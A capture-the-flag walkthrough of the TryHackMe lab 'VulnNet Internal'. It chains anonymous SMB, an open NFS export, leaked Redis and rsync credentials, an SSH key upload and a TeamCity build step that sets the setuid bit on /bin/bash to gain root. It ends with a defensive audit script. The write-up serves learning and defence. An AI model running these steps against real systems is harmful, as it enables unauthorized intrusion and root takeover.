TryHackMe VulnNet Internal As a Penetration Testing

The TryHackMe platform develops virtual classrooms that not only let users deploy training environments with the click of a button, but also reinforce learning through a question-and-answer approach. It is a comfortable way to learn using pre-designed courses that include virtual machines (VMs) hosted in the cloud.

While a question-and-answer model does make learning easier, TryHackMe also lets users create their own virtual classrooms to teach particular topics, effectively becoming teachers. This not only gives other users rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.

VulnNet Entertainment learns from its mistakes, and now they have something new for you...
We start this TryHackMe room with a quick scan of all ports using threader3000 and, at the same time, an nmap service scan to cover the top ports.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo nmap -A -T4 -Pn -sV -vv -p- 10.10.155.145
[sudo] password for hackerboy:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:10 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Scanning 10.10.155.145 [65535 ports]
Discovered open port 111/tcp on 10.10.155.145
Discovered open port 22/tcp on 10.10.155.145
Discovered open port 139/tcp on 10.10.155.145
Discovered open port 445/tcp on 10.10.155.145
Discovered open port 45811/tcp on 10.10.155.145
Discovered open port 51665/tcp on 10.10.155.145
Discovered open port 57017/tcp on 10.10.155.145
Discovered open port 39557/tcp on 10.10.155.145
Discovered open port 2049/tcp on 10.10.155.145
Discovered open port 6379/tcp on 10.10.155.145
Discovered open port 873/tcp on 10.10.155.145
Completed SYN Stealth Scan at 19:19, 520.86s elapsed (65535 total ports)
Nmap scan report for 10.10.155.145
Host is up, received user-set (0.21s latency).
Scanned at 2021-05-10 19:10:58 IST for 561s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE    SERVICE     REASON         VERSION
22/tcp    open     ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp   open     rpcbind     syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      40068/udp6  mountd
|   100005  1,2,3      51665/tcp   mountd
|   100005  1,2,3      51843/tcp6  mountd
|   100005  1,2,3      56229/udp   mountd
|   100021  1,3,4      39572/udp6  nlockmgr
|   100021  1,3,4      39935/tcp6  nlockmgr
|   100021  1,3,4      45811/tcp   nlockmgr
|   100021  1,3,4      48120/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open     rsync       syn-ack ttl 63 (protocol version 31)
2049/tcp  open     nfs_acl     syn-ack ttl 63 3 (RPC #100227)
6379/tcp  open     redis       syn-ack ttl 63 Redis key-value store
9090/tcp  filtered zeus-admin  no-response
39557/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
45811/tcp open     nlockmgr    syn-ack ttl 63 1-4 (RPC #100021)
51665/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
57017/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/10%OT=22%CT=1%CU=40428%PV=Y%DS=2%DC=T%G=Y%TM=60993A1
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 30.994 days (since Fri Apr  9 19:28:16 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 562.27 seconds
           Raw packets sent: 69689 (3.070MB) | Rcvd: 70367 (3.159MB)

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo nmap -p 445 --script=smb-enum-shares.nse, smb-enum-users.nse 10.10.155.145
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:46 IST
Failed to resolve "smb-enum-users.nse".
Nmap scan report for 10.10.155.145
Host is up (0.21s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.155.145\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (vulnnet-internal server (Samba, Ubuntu))
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.155.145\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users:
|     Path: C:\var\lib\samba\printers
|     Anonymous access:
|     Current user access:
|   \\10.10.155.145\shares:
|     Type: STYPE_DISKTREE
|     Comment: VulnNet Business Shares
|     Users: 0
|     Max Users:
|     Path: C:\opt\shares
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 32.14 seconds

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$
After reviewing the full nmap output, we see several services worth enumerating. We start with SMB.
SMB Enumeration: 138 & 445
We run the enum4linux tool from our machine against the target IP:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ enum4linux 10.10.155.145
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 10 19:11:45 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.155.145
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==========================================
|    Share Enumeration on 10.10.155.145    |
 ==========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        shares          Disk      VulnNet Business Shares
        IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.155.145
//10.10.155.145/print$  Mapping: DENIED, Listing: N/A
//10.10.155.145/shares  Mapping: OK, Listing: OK
//10.10.155.145/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

enum4linux complete on Mon May 10 19:27:33 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$
I can connect to the shares without supplying a password:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ sudo smbclient //10.10.155.145/shares
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  temp                                D        0  Sat Feb  6 17:15:10 2021
  data                                D        0  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275872 blocks available
smb: \> cd temp
smb: \temp\> ls
  services.txt                        N       38  Sat Feb  6 17:15:09 2021

                11309648 blocks of size 1024. 3275872 blocks available
smb: \temp\> get services.txt
getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \temp\> cd ..
smb: \> ls
  temp                                D        0  Sat Feb  6 17:15:10 2021
  data                                D        0  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \> cd data
smb: \data\> ls
  data.txt                            N       48  Tue Feb  2 14:51:18 2021
  business-req.txt                    N      190  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \data\> get data.txt
getting file \data\data.txt of size 48 as data.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \data\> get business-req.txt
getting file \data\business-req.txt of size 190 as business-req.txt (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \data\> ls
  data.txt                            N       48  Tue Feb  2 14:51:18 2021
  business-req.txt                    N      190  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \data\> cd
smb: \> pwd
Current directory is \\10.10.155.145\shares\
smb: \> exit

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
Browsing around the SMB share, only one file contains useful information: services.txt. Downloading and reading this file gives the first flag.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat services.txt
THM{0a09d51e488f5fa105d8d866a497440a}

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat data.txt
Purge regularly data that is not needed anymore

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat business-req.txt
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed. If you have any questions, please text or phone us.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$
NFS is also open, so I check whether there is anything I can mount:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo showmount -e 10.10.155.145
Export list for 10.10.155.145:
/opt/conf *

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$
Exploit
We start by listing the shares available for mounting from the server using showmount, then we mount the share on our local machine in the conf directory:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ mkdir conf

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo mount -t nfs 10.10.155.145:/opt/conf conf

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls
conf

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ cd conf

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
└─$ ls
hp  init  opt  profile.d  redis  vim  wildmidi

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
└─$ cd redis

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ ls
redis.conf

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$
Enumerating the share, we quickly dive into the redis directory and find notable information in the redis.conf file (note this password for later):
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ ls
redis.conf

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ cat redis.conf
# Redis configuration file example.
#
# If the master is password protected (using the "requirepass" configuration
# directive below) it is possible to tell the slave to authenticate before
# starting the replication synchronization process, otherwise the master will
# refuse the slave request.
#
# masterauth
requirepass "B65Hx562F@ggAZ@F"
#

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$
REDIS Enumeration : 6379
Redis (the Remote Dictionary Server) is an in-memory database. We could enumerate Redis with Netcat, the MSF auxiliary scanner, or redis-cli.
But first you need to install redis-cli on your Linux machine (or whatever you use):
apt-get install redis-tools
Using redis-cli, which is the best option in my opinion, we connect to the Redis server with the credentials found in the mount earlier, then query it for the list and contents of the databases it holds.
I found a Redis password, so I can use it to log in to the open Redis port:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.155.145:6379> keys *
1) "marketlist"
2) "tmp"
3) "internal flag"
4) "int"
5) "authlist"
10.10.155.145:6379> get "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
10.10.155.145:6379>
A list of useful commands can be found at https://redis.io/commands. After playing around, and through trial and error, I was finally able to locate the internal flag.
Once again, after trying different commands, I was finally able to access the authlist.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.155.145:6379> keys *
1) "marketlist"
2) "tmp"
3) "internal flag"
4) "int"
5) "authlist"
10.10.155.145:6379> type authlist
list
10.10.155.145:6379> lrange authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.155.145:6379>
Decoding the cypher
From the look of it, we can tell that it's encoded in base64. Let's decode it.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$
This leads us to rsync; again this is not at all surprising as we saw all these services running in our initial nmap scan.
Enumerating rsync
A quick refresher using --help shows us the switches we need to use.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -av --list-only rsync://10.10.155.145:873
files           Necessary home interaction

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$
Creating a folder and copying the files
Browsing the directory, we find user.txt. Other than that, there isn't anything useful here except the username. Now we can try to upload a public SSH key to the server and SSH into it.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ mkdir files

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -av rsync://rsync-connect@10.10.155.145:873/files ./rsync
Password:
receiving incremental file list
created directory ./rsync
./
sys-internal/
sys-internal/.bashrc
sys-internal/.rediscli_history -> /dev/null
sys-internal/.sudo_as_admin_successful
sys-internal/.xsession-errors.old
sys-internal/user.txt
I can download files, like user.txt, but I also have the ability to upload files. I can upload an authorized_keys file I made to .ssh so I can log in through SSH. To start, I create a key pair on my local system, without a passphrase:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh-keygen -f ./id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:I7t5fUgaY64/PuMwMpQKdzKt6/b0nnOMyjWauT33GfI hackerboy@KumarAtulJaiswal
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|                 |
|                 |
|      . .        |
|. + = . S        |
| o B o+..        |
| o + *=.*..      |
|  .+ X+B@ooo.    |
|  oo.O+O@+=E.    |
+----[SHA256]-----+

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$
With this created, I make a copy of id_rsa.pub named authorized_keys, then upload the file.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls
id_rsa  id_rsa.pub

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo cp id_rsa.pub authorized_keys
[sudo] password for hackerboy:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls
authorized_keys  id_rsa  id_rsa.pub

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$
The upload is authenticated with the rsync password found earlier, Hcg3HP67@TW@Bc72v:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.155.145:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g
Password:
sending incremental file list
id_rsa.pub

sent 674 bytes  received 35 bytes  18.42 bytes/sec
total size is 580  speedup is 0.82

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$
Other Method for Uploading a File
Alternatively, we can transfer the file with Python 3's built-in HTTP server:
python3 -m http.server 1234
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.8.61.234 - - [10/May/2021 23:15:41] "GET / HTTP/1.1" 200 -
10.8.61.234 - - [10/May/2021 23:15:41] code 404, message File not found
10.8.61.234 - - [10/May/2021 23:15:41] "GET /favicon.ico HTTP/1.1" 404 -
10.10.155.145 - - [10/May/2021 23:16:15] "GET /authorized_keys HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$
Then open 10.8.61.234:1234 in the browser (using your own IP and the port given to the command above) to confirm the server is up, and download the file on the target machine (sys-internal@vulnnet-internal) with wget. (Note: wget is already installed on the sys-internal machine, but curl is not.)
sys-internal@vulnnet-internal:~/.ssh$ wget http://10.8.61.234:1234/authorized_keys
--2021-05-10 14:16:10--  http://10.8.61.234:1234/authorized_keys
Connecting to 10.8.61.234:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 580 [application/octet-stream]
Saving to: ‘authorized_keys.1’

authorized_keys      100%[===========================================================>]     580  --.-KB/s    in 0s

2021-05-10 14:16:11 (76.5 MB/s) - ‘authorized_keys.1’ saved [580/580]

sys-internal@vulnnet-internal:~/.ssh$ ls
authorized_keys  authorized_keys
sys-internal@vulnnet-internal:~/.ssh$
I can now log in as sys-internal through SSH from our machine:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh -i id_rsa sys-internal@10.10.155.145
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon May 10 13:57:55 2021 from 10.8.61.234
sys-internal@vulnnet-internal:~$ whoami
sys-internal
sys-internal@vulnnet-internal:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
sys-internal@vulnnet-internal:~$
Privilege Escalation
Manually enumerating, I find a directory under / named TeamCity. Looking at it, I see it is running a web server, and TeamCity-readme.txt describes the layout:
sys-internal@vulnnet-internal:~$ cd /TeamCity
sys-internal@vulnnet-internal:/TeamCity$ ls
bin  buildAgent  devPackage  licenses  service.properties  temp  webapps
BUILD_85899  conf  lib  logs  TeamCity-readme.txt  Tomcat-running.txt  work
sys-internal@vulnnet-internal:/TeamCity$ cat TeamCity-readme.txt
This is the JetBrains TeamCity home directory.

For evaluation purposes, we recommend running both server and agent.

If you need to run only the TeamCity server, execute:
* On Windows: `.\bin\teamcity-server.bat start`
* On Linux and macOS: `./bin/teamcity-server.sh start`
sys-internal@vulnnet-internal:/TeamCity$
sys-internal@vulnnet-internal:/TeamCity$ ss | grep 8111
tcp   ESTAB       0  0  [::ffff:127.0.0.1]:58689  [::ffff:127.0.0.1]:8111
tcp   CLOSE-WAIT  1  0  [::ffff:127.0.0.1]:39595  [::ffff:127.0.0.1]:8111
tcp   ESTAB       0  0  [::ffff:127.0.0.1]:8111   [::ffff:127.0.0.1]:58689
sys-internal@vulnnet-internal:/TeamCity$
I can set up an SSH port forwarding so I can access port 8111 on my localhost
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh sys-internal@10.10.155.145 -i id_rsa -L 8111:localhost:8111
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon May 10 14:20:06 2021 from 10.8.61.234
sys-internal@vulnnet-internal:~$
Now when I go to localhost:8111 I can connect to TeamCity, and it is running version 2.2.
When I click on "Login as Super User" I see I need an authentication token. Going back to my SSH session, I can grep for one:
sys-internal@vulnnet-internal:/TeamCity$ grep -r "authentication token"
grep: temp/jna-3506402: Permission denied
grep: webapps/ROOT/plugins/TeamCity.SharedResources: Permission denied
grep: webapps/ROOT/plugins/data-dir-browse: Permission denied
grep: webapps/ROOT/plugins/coverage: Permission denied
logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
sys-internal@vulnnet-internal:/TeamCity$
Authentication token: 8070510537629599387
I found several authentication tokens in logs/catalina.out. Using these, I can log in. Poking around, I find I can create a new build.
When creating a new build, I can add a build step that executes Python. My first thought was to throw in a Python reverse shell, but this did not work, so don't worry, we have a second solution.
Since TeamCity is running as root, whatever connection we can get it to spawn will have root permissions, so we immediately started to poke around for console pages, a terminal, or anything else that could be used to run system commands. After a while we figured out that you can create a project and then a build configuration, skipping the "New VCS Root" question. After creating the build configuration, choose "Build Steps" in the left-hand menu to add a build step, choose the runner type "Python", choose "Custom script" as the command, and in the custom script section write a simple script. I can set the SUID bit on a binary to elevate my privileges; since bash is the easiest, I chose that:
import os
os.system("chmod +s /bin/bash")
After saving this build and running it, I go back to SSH session.
Here, I see /bin/bash permissions have changed.
sys-internal@vulnnet-internal:/TeamCity$ cd
sys-internal@vulnnet-internal:~$ ls /bin/bash
/bin/bash
sys-internal@vulnnet-internal:~$
I can now elevate my privileges to root and, as root, read root.txt:
sys-internal@vulnnet-internal:~$ cd /bin/bash
-bash: cd: /bin/bash: Not a directory
sys-internal@vulnnet-internal:~$ /bin/bash -p
bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
bash-4.4#
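As an added example (not part of the original writeup), here are shell audit helpers a defender can run on a host to catch the three misconfigurations this room chains together: the NFS export mounted by any host, the rsync module that accepts uploads, and an unexpected setuid binary such as /bin/bash after "chmod +s". The sample files written by demo() are constructed to mirror the room; the rsyncd.conf contents and the allow-list are assumptions, not taken from the target.

```shell
#!/bin/sh
# Host-audit helpers (added example, not from the original writeup).
# They flag the three misconfigurations this room chains together:
#   1. an NFS export that any host may mount ("*" in /etc/exports),
#   2. an rsync module that accepts uploads ("read only = no" in rsyncd.conf),
#   3. a setuid regular file not on an allow-list (e.g. /bin/bash after "chmod +s").

# nfs_open_exports FILE
# Print export paths from an /etc/exports-style FILE whose client list
# contains "*" (optionally with options, e.g. "*(rw,sync)"). Comments are skipped.
nfs_open_exports() {
    awk '!/^[[:space:]]*#/ && NF >= 2 {
            for (i = 2; i <= NF; i++) if ($i ~ /^\*/) { print $1; break }
         }' "$1"
}

# rsync_writable_modules FILE
# Print module names from an rsyncd.conf-style FILE whose effective setting is
# "read only = no". rsync defaults to read-only; a "read only" line before the
# first [module] changes the default for every module that does not override it.
rsync_writable_modules() {
    awk '
        BEGIN { gro = "yes"; mod = "" }
        function flush() { if (mod != "" && ro == "no") print mod }
        /^[[:space:]]*\[/ {
            flush()
            mod = $0; gsub(/\[|\]|[[:space:]]/, "", mod); ro = gro
            next
        }
        /^[[:space:]]*read only[[:space:]]*=/ {
            v = tolower($0); sub(/.*=[[:space:]]*/, "", v); sub(/[[:space:]]+$/, "", v)
            v = (v == "no" || v == "false" || v == "0") ? "no" : "yes"
            if (mod == "") gro = v; else ro = v
        }
        END { flush() }' "$1"
}

# unexpected_suid ALLOWLIST DIR...
# Print setuid regular files under DIR(s) whose full path is not listed,
# one per line, in ALLOWLIST. Stays on one filesystem (-xdev).
unexpected_suid() {
    allow=$1; shift
    find "$@" -xdev -type f -perm -4000 2>/dev/null | grep -vxF -f "$allow" || true
}

# demo: run the checks against constructed sample files that mirror the room.
demo() {
    d=$(mktemp -d)
    # Constructed /etc/exports: the room exported /opt/conf to every host.
    printf '/opt/conf *(rw,sync,no_subtree_check)\n/srv/lan 10.0.0.0/24(ro)\n' > "$d/exports"
    # Constructed rsyncd.conf (assumed layout; the target's real file is not on the page).
    printf '[files]\n  path = /home\n  comment = Necessary home interaction\n  read only = no\n  auth users = rsync-connect\n[pub]\n  path = /srv/pub\n' > "$d/rsyncd.conf"
    : > "$d/allow"                               # empty allow-list: report every setuid file
    touch "$d/shell" && chmod 4755 "$d/shell"    # stands in for a setuid /bin/bash
    nfs_open_exports "$d/exports"                # prints /opt/conf
    rsync_writable_modules "$d/rsyncd.conf"      # prints files
    unexpected_suid "$d/allow" "$d"              # prints .../shell
    rm -rf "$d"
}

demo
```

On a real host, point nfs_open_exports at /etc/exports, rsync_writable_modules at /etc/rsyncd.conf, and unexpected_suid at a baseline list of the setuid files you expect.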
Finally we won!! Thanks for supporting :-)
- Hacking Truth by Kumar Atul Jaiswal